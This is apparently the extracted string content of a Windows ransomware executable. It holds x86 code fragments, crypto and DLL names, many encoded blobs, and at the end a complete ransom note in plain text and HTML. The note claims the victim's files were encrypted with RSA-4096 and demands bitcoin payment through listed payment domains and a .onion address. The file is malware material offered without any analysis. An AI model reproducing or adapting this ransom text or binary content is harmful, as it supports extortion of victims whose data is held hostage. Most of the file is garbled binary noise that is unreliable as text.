!This program cannot be run in DOS mode.
ZC5VZ
ZC5TZ
ZRich
9/gV
.text
`.rdata
@.data
.rsrc
@.reloc
h@#C
QRPhH#C
hH#C
h\#C
h@#C
h@#C
PQRhH#C
hH#C
SVWf
PjAh?
RWQSP
WRSP
RPVV
PjAhW
SVW3
Sj1R
QRWSP
VRWSP
u#Vh?
VjAh?
WSRP
u#Vhx
VjAhx
QWVSR
RSVV
SVW;P
|$$t@;
;t$ w
+L$ 
(;L$$w
;t$ s
+t$ 
L$,u
y"SVW
PSPQ
PSPQ
PSPQ
PSPQ
PSPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
SWQV
<SVW
|$ ;
;D$ s
T$ ;
;|$ s
\$ ;
;\$ s
\$ +
+\$(
T$ ;
9D$$t
9D$$w
\$ +
+\$(
T$ ;
9D$$t
9D$$w
\$ +
+\$(
T$ ;
9D$$t
9D$$w
\$ +
+\$(
T$ ;
9D$$t
9D$$w
D$$;D$,t#
T$,9T$$w
PSVW
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PSPS
PQPQ
PSVW
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PQPQ
PSPS
PQPQ
9G(u
G VP
SW9F
t[VW
_^[]
9C(u
\$$u
@VPW
9t$ 
+T$ 
D$tSRPP
;D$(u
;L$,u
T$,R
T$,RWVQP
D$,PQRS
L$4+
|$HPW
PSPW
D$H3
D$8P
D$PP
9|$Hs
D$X;
;D$8rv
D$89D$Xu
9t$8r2
D$D9D$Tw
;|$@s
+|$@
D$T;
D$X;D$8s
QSVR
9W(u
WRVVj
D$$VP
D$$RPS
RVPQS
PQSV
T$ VR
T$ PQVRj
D$,_^[
WQPR
C$VW3
9{(u
C$9{$u
9{(u
SQVRj
{ _^
SV;G
^[Y]
Wu,I
QSVW
t!9]
QPWVVj
C$VW
9C(u
SQPW
{ _^
WQVVj
C$VW
9C(u
SQPW
{ _^
N$1O
C$VW
9C(u
C QW
{ _^
C$VW
9C(u
T$4RWP
j@PP
L$4QPj
T$,SRWWj
{ _^
u"Pj
VRPQ
VRQP
RPQW
RSWS
PWSS
 SVW
PVQR
VPQS
Vt-PSP
9s(u
t	;E
L$$;N
L$$;N
D$ _^[
_^[Y]
_^[Y]
L$@3
L$@3
L$@3
L$0j
L$<j
T$$RVf
L$<f
D$@j
D$4PVf
L$Tj
L$DQ
D$pVV
L$8VQ
|$@#
L$@3
Rhx,C
hx,C
_^[3
L$x3
L$x3
L$x3
L$`j
L$p3
T$t3
T$(3
D$T3
T$83
L$$j
T$,Q
\$D3
T$hj
T$\Rf
D$|f
D$X3
L$lQVV
D$hj
T$|R
6y/@
%P;@
T$hVR
T$p#
L$x3
_^[3
L$Pj
|$t3
T$$u
D$tPVV
D$|3
D$d3
D$0j
D$P3
D$tPVf
T$D+
L$DVV
T$t+
T$dj
6y/Gj
%P;@
hx)C
_^[3
L$`j
T$$u
T$tRVV
D$<VV
D$df
%P;@
hX*C
_^[3
L$X3
L$X3
L$X3
\$(3
D$L3
D$$P
L$8VQ
T$@#
L$X3
_^[3
t*;O
T$$;
u!9W(u
G$9L$
T$(R
D$$_^[
PQVS
PQNV
QPPP
RWPQ
VSPQ
PVQR
WPQR
_^[Y]
t)VSW
_^[Y]
_^[Y]
u,@;G
_^[Y]
_^[Y]
u&QR
QSVW
_^[Y]
VRQP
_^[Y]
SMST
sm<=u
Q<+u
F</u
SMST
hB=K
hB=K
B<#u
u	_^3
t+hbg
t0hg
SMSTW
t2VhTs
SMST
SMST
h(0C
hD0C
SRj@
SVWj
D$63
D$&f
T$ R
D$ P
L$ Q
T$ Rh
D$HPW
f9tG
QSVW
t"f;E
hp0C
PQSW
t%Sj
QRPW
1f;2u
9C(u
t$ SR
T$$P
_^[]
_^[]
txVW
QhX-C
9_(u
WQRVP
tq9E
WSPV
HHQVV
tg9E
HHQVV
u!RW
PRVS
FHSP
RSPWj
NtQV
VtWR
QWWV
OHQP
u	9u
OtQSW
OtQS
t$$;
9s(u
OtQRW
GtPQ
t$,WV
sHVP
QWWS
sHVP
QWWS
sHVP
9q0u
RWWS
,SPW
QhX-C
WSVR
^_[]
AdV3
t$ ;
9w(u
t$$W
,RVS
sHVP
WQVS
QVRS
CHPQVR
D$ _^[
T$4;
PSVW
u9SV
u-WV
,PWV
D$ SW
,PWWV
T$,SW
|$,W
,PWV
L$$SW
,PWWV
D$,W
|$<PW
D$$P
D$$PP
D$,QPP
SQRP
D$$SQ
T$(SPRP
D$ SQ
T$ R
D$4_^[
,SVW
t$4;
uGRW
9s(u
F,PQW
t$(WQV
,PVW
SVVW
OtQVVW
SRWV
D$$SW
|$0PWV
SWVQ
D$,PV
SVQVR
D$4_^[
$SVW
9C(u
SVPW
T$$SVQRW
PVVW
GtPQVW
tWPP
PVVW
D$,_^[
AdVW
uDWS
9G(u
,PVS
,QPS
D$ WQ
,PVVS
t$$VVS
D$ WV
D$(_^[
9_(u
u4WVSR
$SV3
t$,9u
9s(u
WHRPP
RPPW
T$,P
D$ RPW
,VPW
SVPPW
D$,_^[
HQVVj
WSRP
VSQRW
hx'C
VSQRW
^_[]
ODVQ
GDVP
O@Qh
tL9^
u,_[]
_^[]
_^[]
PSWR
RPWSQ
VPWSQ
t$`;
9u u
T$4;
|$0;
\$D;
T$<RQ
|$$;
T$X9C
D$8;
T$(9\$
?;|$,v
;D$8
T$$RQ
L$$;L$,w/
|$HH
D$d9D$
>9|$$
)|$$
L$PRQP
;D$,v
;D$0
;D$8r
;|$X
t$4;
T$DRQ
D$X;
] SRVP
D$XI
D$X;
;D$8
L$(3
L$(@;
D$ RPQ
D$,H
;D$LtC
9L$L
VQQR
;D$0
T$ R
D$`_^[
u0h,1C
h01C
Ping
SSSSh
D$ SP
D$(<
D$0;
T$,PR
D$L;
L$HPQ
T$PPhH
L$\+
D$\g
D$dr
D$h:
h81C
SSjP
Ph@1C
SSSS
\$$V
hD1C
hP1C
t+hbg
hb)!
QPPO
V	0P
QPPO
D$Df
gfff
T$LR
T$0V
L$ h
L$8WQ
T$0j
D$PP
L$$Q
T$`R
D$,P
)t$<
uCPh
L$\_^[3
D$PS
L$P3
gfff
D$ u
9|$<t
L$8f
D$LP
T$0j
T$PR
L$$Q
+t$\
T$0V
D$ h
D$HP
D$8G;
D$DP
T$0j
T$XR
T$<j
L$\_^[3
D$$W
h@2C
$jDQ
T$$S
h\2C
D$$ht2C
L$$h
T$<R
Pj@Q
T$,j
T$(j
D$<P
Qj@R
D$,j
L$$Q
h(3C
h43C
h@3C
hP3C
h`3C
hp3C
9\$0
9\$$
9\$ 
9\$H
9\$<
9\$D
9\$8
9\$@
9\$4
9\$(t
T$|RP
T$`R
D$d$
D$XP
L$|QR
T$Tj
_^[3
F\ _^
x@VW
PQVS3
s^[]
_^[]
h06C
jHhH5C
jHhh4C
DWh 4C
PSSSSSSh 
j	Pf
D$,Ph
T$0RP
T$63
P0QW
T$(RP
9\$(
\$ ;
T$ RP
w.t:
D$$Pj
h8\C
L$ h
h09A
_^[3
QVVj
QRVj
SVWj
h4U5
_^[h`
tVSW
SVW3
tDSW
RWSV
t+hbg
t+hbg
t+hbg
~h[_
 tMv
~\[_
USVW
_^[]
USVW
E03E
E43E
E83E
E<QR
EP3E4
ET3E8
EX3E<
E\QR
Ep3ET
Et3EX
Ex3E\
E|QR
_^[]1
USVW
_^[]
USVW
_^[]1
 SW3
8CSVhdhB
8"uY
WVhdhB
8"u%
_^[]
woVW
 SW3
8CSVh?wB
8"u]
WVh?wB
8"u'
_^[]
_^[]
t'Ou
YY;E
_^[]
t)Ou
SSSSS
_^[]
VW9]
_^[]
t"Ou
f9;u 
@uoW
uTVWh
YQPVh
PPPPP
@u^V
t%HHt
HHtXHHt
HHty+
RPSW
90tW
?If90t
@u^V
t$HHt
HHtYHHt
HHty+
RPSW
90tX
PPPPP
<v*V
^SSSSS
j0Xf
RPSW
90tN
j Xf
t&:a
_^[]
Y_^[]
Fpt"
F\=0
Y;=H
AWf;
tRHtC
tEHt0
u%	U
f9>t
f9>t
>=uu
f9>t
f9>t
Y__^[
9csm
URPQQh
L$,3
UVWS
[_^]
SVWj
_^[]
uNSW
j@j ^V
SWf9M
j@j 
~,WPV
98t^
tVPV
t/9U
t!Ht
_^[]
Y_^[
Y_^[
8csm
 w	f
"u	3
tAVWP
Y[_^
PPPPP
8"u8
t	j\Yf
t$9U
QQSVWh
VVhU
u,9E
QSWVj
v	N+D$
u}ht
~%9M
QVj	
r 8^
9]$u
9](SS
t"SS9] u
9] SS
v4;5
vL;5
PPPPPPPP
PPPPPPPP
tCHt(Ht 
3t(;
SSSSS
t(9}
SW9E
t?f;
Vuy3
SVWUj
]_^[
;t$,v-
UQPXY]Y[
_^[]
j@j 
oV f
o^0f
of@f
onPf
ov`f
o~pf
FGIu
X^_]
FGIu
SVW3
Ht%C
Ht(f
_^[u
9csm
?w&w
$w.A%w
@%wJ@%w
C%w$
F%wi
iTu;
_Tu@fTu
uM |u
X0Wp
CorExitProcess
bad allocation
(null)
( 8PX
700WP
`h````
xpxxxx
('8PW
700PP
`h`hhh
xppwpp
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
July
June
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Unknown exception
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
 Complete Object Locator'
 Class Hierarchy Descriptor'
 Base Class Array'
 Base Class Descriptor at (
 Type Descriptor'
`local static thread guard'
`managed vectorArrayList copy constructor iterator'
`vectorArrayList vbase copy constructor iterator'
`vectorArrayList copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vectorArrayList vbase copy constructor iterator'
`eh vectorArrayList copy constructor iterator'
`managed vectorArrayList destructor iterator'
`managed vectorArrayList constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
 delete[]
 new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt returning'
`copy constructor closure'
`eh vectorArrayList vbase constructor iterator'
`eh vectorArrayList destructor iterator'
`eh vectorArrayList constructor iterator'
`virtual displacement map'
`vectorArrayList vbase constructor iterator'
`vectorArrayList destructor iterator'
`vectorArrayList constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vectorArrayList deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
 delete
 new
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
Software\%S
S-1-5-18\
data
0123456789ABCDEF
SHA-256
vRQ>
8STs
LwH'
RIPE-MD160
2.2.0
ECDH
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
0123456789ABCDEF
Big Number
123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz
.dll
advapi32.dll
user32.dll
ws2_32.dll
ntdll.dll
winsta.dll
shell32.dll
wininet.dll
urlmon.dll
nspr4.dll
ssl3.dll
winmm.dll
cabinet.dll
opera.dll
Gdi32.dll
gdiplus.dll
crypt32.dll
SHLWAPI.dll
Imagehlp.dll
psapi.dll
olE32.dll
winspool.drv
OpenSSL ECDH method
SECG curve over a 256 bit prime field
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
ypted
%s?%s
INSERTED
....................
NetStatisticsGet
NetApiBufferFree
CryptAcquireContextW
CryptGenRandom
CryptReleaseContext
CreateToolhelp32Snapshot
CloseToolhelp32Snapshot
Heap32First
Heap32Next
Heap32ListFirst
Heap32ListNext
Process32First
Process32Next
Thread32First
Thread32Next
Module32First
Module32Next
a5HBkCG873bysxNeC6PH2h4fCoL6g6EKSMszqPPLXZ/RKj5w1771kDFW7g6fRF==
hwxFzlV8DwHSQh7idjLqhJxDVp/hVq7niSOwDwRRUfcXu4UNf/EEmBlI5v/AIDxmU6uVM0L9
zI+1SHkuf6iG3z2gF82kwcyl1gs6gncpcSYuy2KM1hXm+PFPIO0x0oCAkwQ4G9==
hPXqNDJm5bUcUNfLXqoz2JjOoEyZicYMj8+QMu7L39XmAKfppFRb10Ic8QOceM==
bacU06hTu3WUQeZaJeXunM7Rnn9jPDRBshMeE9W8Dr2T45ZrN57cEU1fvn9qW74ca9pHVRq9
BQunWRrFXH2bbgcb1Bsv126EvSjtql4/3yn4CQpLeey3fXBkX90rzXUVyATXUT==
qGhjKHA0fJK6ybf48OttBAh1BBUlHy8SjHVJK4DRGgOc0FeVKaHnKa/yX4HxBFCUD49iFbdF
C1SCv90oFgr65jUPxXCclvsQhvlgbxewTIRrv0SnHOOYySrrxmh1UnvFf/Esl3r8ZSc2fP5iyzRGxzsRIgoCMiBCUvWxsq/ZXgeLOfrQc3x8kbFA4qizczC6f2Ior4Hl0W26qizFSaFT1GUTRgb=
e7BqthOeTkFVBWInEbEX23/twQmqzk==
UOgXZGXoPE7U55IOU6iDzejSXg61ba==
Ka0lDj+kX3kgjnMcu6icPeb1OA0lce==
1kWth5h7Ub4GXc4q07H1FSy9LgttAz==
+kye0PKWh9cktFgdaVjlaXOgewTfG9==
fLYmVLtDGDcX4LetbtYoiFs2RQwo4D==
JBTWxUa4BDZ3eRHu9ZM7zOAtcgoepG==
+Vr5x2NNLmNIpPCRbCFIS9ZkqAMZFU==
jD1sXZxLdbvnQIBdX7H/NdtiUgnd6e==
GpJOb4k+7cSoe8rw5Yf8fgq5ab/a2qSLIo48ms0X
QnyxNhZFww3DYiXKooqnScgv3Amgyf==
fKZ+ctccaasPq8mLgFlVigtKaAxN71==
xzJOz8bXvTFTrIX+vnlkJt9iPAPVML==
viJaqvxMbNr7fOnQUPk+dYI+rPfzqGeTZJA2fSrt
9XutF7MIaZbDBWJDdJ7E05wW3w10r9==
gkMzCeHLdvHQzeeUprM+1BMXlQbsd7==
FfDG3vJmZ4tBo7tk6VqHseWexAPXab==
JrtM7tY23bKMr2PXxliWUWZ5NQouCx==
50k//Xss+lBySpo0NHeIYtygJwYmty==
PUzP1t/5JdySIdHtI0tU6JZKAQwFLm==
rRnVHkoBv2+M9b6+rQ8em+L0wwkMcF==
/jfi5vhThp20v+2kak7XeoPUAQgEUT==
JFrYA6PaSjErFOPNRbO3Ix4WSg3BVZ==
fpjnGWRJqffTfXok/S5vISIrBgpgyJ==
TuLrCgYQuZWHOJ4pGhQJVgiXvQEQYb==
Y7weUIk+Fb+SONusuQfoPc6D+L15NWB9DL1PuFsk
L7vFQPTJuJ3QvvloHguFQCbKUg1d6X==
ho1duSWSqrERIbVGyJv+xD4SlAL/gK==
ym3mhhEUz1M3q8SO+bpmH3YZWAp5cA==
ctJ9P89dUOKOPyP45J6dq/JveVWkQUEyvk3lbFsK
ttbTfOeKO5QYm5Cf4A35Cpg9rQbM/I==
WF7q7pTTwswUsoXH+L8I2c8SXAEb7V==
xeViv82TzaWVgNrsnpYagTRGjAiGRf==
C/Y/OVpT7uM3ECy8g9dYTJ6XPQ/B7m==
fMqwflOAZ5he9vQwYUncBFZ54ApoPd==
kbD/1Ws3PA/Oza0ZvS1SSO4CsAPd5X==
jEgVPn2DRAebYl6lqLEEU662aQCrfk==
VIjk42qTc4tjM8zrruVFO/vpQQN5jw==
c6D7x5lpduMC52RAVIEIPRea7gy5TK==
h+EZ5/RyIW0gfirK3ehJ4irAag0NQZ==
/G8+r6+YHW9BapRo07GxNTY/rgHmtu==
GH/wkgpQaY6x+4N8TVl2vmSaTweUct==
o3z6I4tl4tTcQVxmRvqM+N5KNARO95==
DRNFGI5cK3oVQIVnRTLVOazT9ABcm/==
1IBLJhxJLI12kYYe/8c6N8aGWARlrj==
JvzmUkhdsyXngte+ZHucfC8BpAK6k9==
22ThxHLaUy5vLDyJUqnwvqysMwp4kd==
LJEiK2iarK73huJY3XQ9M+nNlAuOdx==
V4Xy57v940hnj3tA7ktvpSAaowzcnZ==
jX3n/kKLREPe5UIouqO04VBKgQFTCa==
WakN+9VCNlGiJh3thtSveRAjiAHQne==
yf3dtEyPFRuOUMHsFeXRUlH8DA7yx9==
JnqWStmOCrZQWZ93e9wy+v8DKQeeF4==
cr5j9gIuHGHtSz4iruFvdO45Iw/WSE==
Y+gt30ZYAvePOrpbAZRK2CtaSwwGUb==
rHjzZupM2AdMmtGtEwbELj26RgvC6e==
69548pbfxmC27evnFPzWz7nkjQR025==
U8RFNg4eOHiuPn4tBYPoQeh06QHaTz==
MV1VP1HxWoptjIESaNRvj0yf5QNV9S==
oXtwPcCpSW9kI3PLfssIvKJmTg78F7==
07dpmKTAU0Y6y/wijjszi1SbHgLykA==
EzTfAYqaAHHjT1bakocfk3SFZA8jmx==
sp0oQIgj6/9BcwhBTnh7chz9Zwp8ef==
C/5NNnsat+GTXYbQsJxeZRmYKAJLyK==
IOFUR9VBibYFNCyiwHqnPIdZmgHpoI==
HoLhe70Gbttm8GXGNC9h9RFHWgvTEe==
tykx40eY4Lt/XqlahnQ9b2YdFQgK7S==
LO7dlI08e6e6rRWfdRauUBMnKQSKed==
xhR0z5IVOoB9vlRDAX/XCRT3MC/aTSWqTpWwEYcr
AqWDd4DxzVQcC271GVlz/TMDfp7p6E4cgjxr9Opd
Gi6FIRmDK84Jw+SffdkLK9p74QL8Bv==
nzSnbahM5cosHfXcQ/d8/GJJrQELa1==
F7VGwpv9ZAhPJMvPHv+Wsn3CzAE3HN==
CrEIdiyBM27iQPwmaVqA2G+sxA5+d+==
9SkpcrfYoap0uxSfGeXf+E+q+gti7L==
CqbETjPIXYd7rdK+ACM0avJrUwuV6S==
TLQ1v6LjRST/d5BEBvUaJAlObAtjHp==
MyB/TDxLEma3ohjZN42SuYNJmgmdV4==
rDAJxlb+bgWdh5vIU9Norzy28AVmIT==
x5zeEqs1zfcvPWAvaniSfPm8pwvJrN==
F+FnWBfbbIVGR3OoxPVYyRKn1gTFFG==
ZJ/3t3htsdK9hp+gif+nXPxuag3d/c==
kPD6cAh9AdKL0PZW6IjvrPETogRrIi==
1hXrurg8+RHBJDAZw/aqUo3BJQaJYB==
/xMmazLws6Gy+vRo2Ch58Z/ZPw9VRi==
T8thrpWdRrS4LPxI874hhJaxgA2fuH==
oDpvWrbV3MwXG9jvOZKo0ZtDhgv38h==
bc6fYTgq64ZcjwfR3Rhvdt3htA/Qjs==
qYnhgDaau81D3UlxWLXkv5WUQRqEOOtlSOstZ0Dy
ZAp3OMdowr5oAZ5A6li+F/dOrA+wON==
Sih94bdVO5Nbpgn9WtdPWUFhBQ5Lx1==
cHk373dOHf25978KbB/BUXNjLgCHCG==
wNkOl+aOQVA00sdSV7jWaCPVlgL6T8==
I4wbVbpfdzKgpgVnnrTbPkrqcA0oGy==
ZZXkG6St5aDdhF1iEKDu5aEwIgeCJd==
NytnXGuRAMWg+xuzkOpmrAgSwAYKFG==
uUHfnq089VyHNVRHxnu/25QKEgKIOD==
9zjviOJZsd5jXAg0vC89WbODWwcmQV==
FLMylTlYYyBja1HIGoixmg65bww6b1==
dy8+uCbA4RR0t1O01GCVJQNzSQqbYR==
x7T8fbkQk761id9XWFR7Vhzgbw4xY8==
OYI2A+hl37ynFtKBANIKzIWUoANS5W==
z2ZpNYYWR1iV5mkOtV2r2WBIMgL3ci==
hvo9Soh2vTXdzgDB2UsgbsT8eQ102F==
kB67Q8ovtMvYyWcfRNUCSTIY3ASGCF==
MvvajJ4Iu+x2KJC3WCQ3IK2Vkgz2YF==
/6/JPrkHxC7M/eUviyLIOUYHoQcFR0==
sUv75kyspBdWt7EJEG+EL4wa1Q268a==
MRf9oF3A4819KSD7V2x46GGihAiQq7==
EvCcnruIrrOQ0/QKpT0jOpoW8wsLB+==
k/tgJsxh9/MO3roNz9xQdQ9vEAgk7Z==
c97+YVdwrxUzWM91ZQPuh/YZxgW6O2==
ewuXfPRcL2MyQXRGj0tkO9/qDAK7QW==
XW26n5HUcL1zrUKIXJAlSJSOn91DQyDNESTjuc1a
2Q2XpStABPcAUeeXd/S8IbqpHwxMdo==
CfZ82u/Xs+xCU4BXgDBR+tJTbw7zzY==
GlzGEOPM889qNRTEOr/55wImhAXRLg==
19rJJN4TOjQKOKnRrMXeAK0G0Q4YrL==
5yDdM/VFZRWIO5bsPyIOZs4zIgSIrA==
bmo5U1c78V06sFGNUTe6iOTwRQMsu/==
CjsROdmCTP1P2hioAooSNg6JLAYRrd==
37WgFYJwyJ9JGI/Z6s+UQIpyLLT68H9M8TKXnjRg
vXQU5zJ8+Kt5YVqswpnzO37/3AZaNS==
nfJ9lCf9fHtWJvMEVnwSAxHz+wSDP5==
G+as8iqq8v1wLjptnerNOuMX7AcklP==
6c1HQ7hivy27ey0ueb/AiUCz/QQ3Py==
8MeiyNDJ49cKaqLq3Pre3oiH/zti3wpIKZD5uIdb
A35zJ0FpaaARvyCNz+Ue9P9nBwHmrD==
oCcL//gM0I6jhO/FV4dDlWOlyAIZJO==
WjZw62/0K/qOLY0qpjIHdGXU6AkS/M==
TJpvxldfEJCAqvcqHm4or8P3ZQTEG0==
PGD9Te8n63wytCmTKQ3EXE0/iE6fxkQ3LBBjjyQo
dCOF9MPi2uDBm3luVOqu5Y029wZlQk==
R+RhY7HPb05bkW2NYkuQYHhRbQW8ku==
clhMff1Fn7CpSqcIdszyO31QVYWkyruB4tlQxnsf
RjsLjaPPDyDafQjEnv8fcfS73QDhCi==
dfpmev2jAqlCXgHeiFnxErAB6wu/tw==
pBTjA7rBD+nfnRHiAi/XyHLE7wHNI2==
tYOf9mf+nJAzPLQQkd3LdCn3LQMWq2==
8azpyWK8VydWKSydqiN3t/nTxgyFLa==
k/eFBob+Q1vrg10XGIpYwtu3lgNNhN==
EabQ0Z52nMhUzi8OH1RoqfPWXwZEer==
vlqqyK4FESB3dLZb53HPz/JoJgep1z==
nfsXcOwNxH3Y0Sw3w1Qald7m+goZHz==
5nfvjae3Rs4Xgw3q0Or4p3IDBgPdgO==
NpuvWggvc+B7RTSgszd3K/1GeQS564==
ep7L2m9o/nuUHSFXaMfpyJz9HASL25==
vuaojhxCEABJr92crz0n4ZxCLQTqGC==
9+dEr5YNLjsZ/mgTjUO1Rvhmzgby36==
jOBav+0Ued2YMIVTmuwKZ9ytBQHUQ2==
+KunkL6axaafVy2mCHb/SDxJiAad5g==
xoFIQ+9jvbR1v5lqIdPyhg5XSQ5pX2==
WpPo0/o0/s8JFYWX/o9DmrY7KghSr7==
hQq+qnFdkq5+sUQZx2KLodV2wAjGIe==
5m5oh5GdMCtrDj7MXTUE7YWp0Q7E5f==
Z3jJX+s4MZa3APeDSX2pVBjaJwb3Yz==
vZ1k2E64SzC+PIcgwy8QZUjB2w9OgU==
O+IlkVX/tMRMrcSvS3cJUf4IqwgWr4==
bOlpOQZOOY+IlJxbbyRzHAihWgFWlg==
0H2OQlyO/A/VRp3mQaGMSrxlywKxRw==
12Ct6HElJ7gZiCqBe8Iy6nMvPQzfQL==
0J5bz7H0OGik3X2pPXaokaJ8BwN82e==
y77TEFnFAoNNdvAh0PvUStHQqwogwH==
+zDeKXPylDyx6yNy8+hGZ0AJ7gMQgR==
g97w9GycH7k/mlNSWrhTGtFChAwyAu==
r63bcVBuy+3HJFyxBfq7mrA5LwWxFg==
sfPuvAjtlzOE+jyeuLz2P8AAywiY+m==
ktB6wcTAQJS0bX98jk/bAmw3dwBLWh==
cNKS5v5UtydtSyr4uDr8OumxpwXH/a==
tvU+2GnNxD/7FmkpF23uVakwRAvn7o==
URwthMCfIY4fq0hcwgCjzV9kHzlk2u15iX6t+3vC
Wrj9rF+hUcbQC0xbcub38aqvTQSJ+z==
+jkbEi2llT98+xD//7B/OfQYrwSQPy==
q1uhHcRxSXmK5PCx3xR7gKDuOAV4dw==
aUZmLS9MPTBcWCxeklBGb9cP0QjvMO==
yIDcowC9YgkU5/1v8s4ki+5qqwwH/D==
OMPeSOLppdEOgOUWEN5Z0TQpIgAfgr==
Ug6Dl/cQVWfcXwJv8xdGTIDTxgklsr==
oS0UCYfnYlerbn/r94ilic/o6whIBc==
xAMKYWjTbXN3bK/NLbNnTIF23Agl+E==
VVhrdez4fuLZ87H6FEql7ZJ0wARODO==
Vkr+htu5GeE7XxjrwKFRBIrudAmPJ7==
OCITwLVKW7cvQMWduLyhbu/R9wd5E4==
5EYGtUOI4BeTB+m18JN9Z7dY1AaQZ4==
Mcj2Tpce7RLc1xGHIU+4T5jneQtcA8==
HxkcdnbCyEkX0BiltcU1MneE5QZsg2==
4H3ATt5U+SFqLUqcr8SuUjLtOAxyB7==
b1c31pR9SFt0GLEE+WlW7miUpA5O7L==
wyJZnfN5xqgQTL4z4BIEdu570wtJSr==
0AA11r5BFNcpyAr9aAJWhJGQyAeuFv==
 111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111  
NOT YOUR LANGUAGE? USE https://translate.google.com 
What happened to your files ?
All of your files were protected by a strong encryption with RSA-4096.
More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)
What does this mean ?
This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,
it is the same thing as losing them forever, but with our help, you can restore them.
111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
How did this happen ?
---Specially for your PC was generated personal RSA-4096 KEY, both public and private.
---ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.
111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
What do I do ?
So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BTC NOW, and restore your data easy way.
If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.
For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:
1. http://vr6g2curb2kcidou.encpayment23.com/%S
2. http://vr6g2curb2kcidou.expay34.com/%S
3. http://psbc532jm8c.hsh73cu37n1.net/%S
4. https://vr6g2curb2kcidou.onion.to/%S 
If for some reasons the addresses are not available, follow these steps:
1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 
2. After a successful installation, run the browser and wait for initialization.
3. Type in the address bar: vr6g2curb2kcidou.onion/%S 
4. Follow the instructions on the site.
IMPORTANT INFORMATION:
Your personal pages:
http://vr6g2curb2kcidou.encpayment23.com/%S
http://vr6g2curb2kcidou.expay34.com/%S
http://psbc532jm8c.hsh73cu37n1.net/%S 
https://vr6g2curb2kcidou.onion.to/%S  
Your personal page (using TOR-Browser): vr6g2curb2kcidou.onion/%S 
Your personal identification number (if you open the site (or TOR-Browser's) directly): %S
111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
<html>
<!-- ===2134123421=34234123421342134213=====2134=123=2314 --> <style>a { color:green; }.tb {  background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }
.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <!--===2134123421=34234123421342134213=====2134=123=2314-===2134123421=34234123421342134213=====2134=123=2314 --> <center>
<div style="text-align:left; font-family:Arial; <!------===2134123421=34234123421342134213=====2134=123=2314 -->  font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">
<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>
What happened <!------===2134123421=34234123421342134213=====2134=123=2314 --> to your files?</b></font><br> <font style="font-size:13px;">All of your files were<!------===2134123421=34234123421342134213=====2134=123=2314  -->  protected by a strong<!------===2134123421=34234123421342134213=====2134=123=2314  --> encryption with<!------===2134123421=34234123421342134213=====2134=123=2314  --> RSA-4096 
<br> More information about the <!------===2134123421=34234123421342134213=====2134=123=2314 -->encryption RSA-4096 can be<!------===2134123421=34234123421342134213=====2134=123=2314  --> found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font>
<br><b><font class="ttl">What <!------===2134123421=34234123421342134213=====2134=123=2314 --> does this mean?</b></font><br><font style="font-size:13px;">
This<!------===2134123421=34234123421342134213=====2134=123=2314 -->  means that the <!------===2134123421=34234123421342134213=====2134=123=2314 --> structure and data within your files have been irrevocably <!------===2134123421=34234123421342134213=====2134=123=2314 -->changed, you will not be able to work<br> with them, read<!------===2134123421=34234123421342134213=====2134=123=2314  --> them or see them, it is the same thing <!------2333232 -->as losing them forever, 
but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font>  <br>    <font style="font-size:13px;">  Especially for you, on our server was generated the secret key pair RSA-4096 - public and private.
<br>All your  <!------===2134123421=34234123421342134213=====2134=123=2314 --> files were encrypted with the public key, <!------===2134123421=34234123421342134213=====2134=123=2314 --> which has been <!------===2134123421=34234123421342134213=====2134=123=2314 --> 
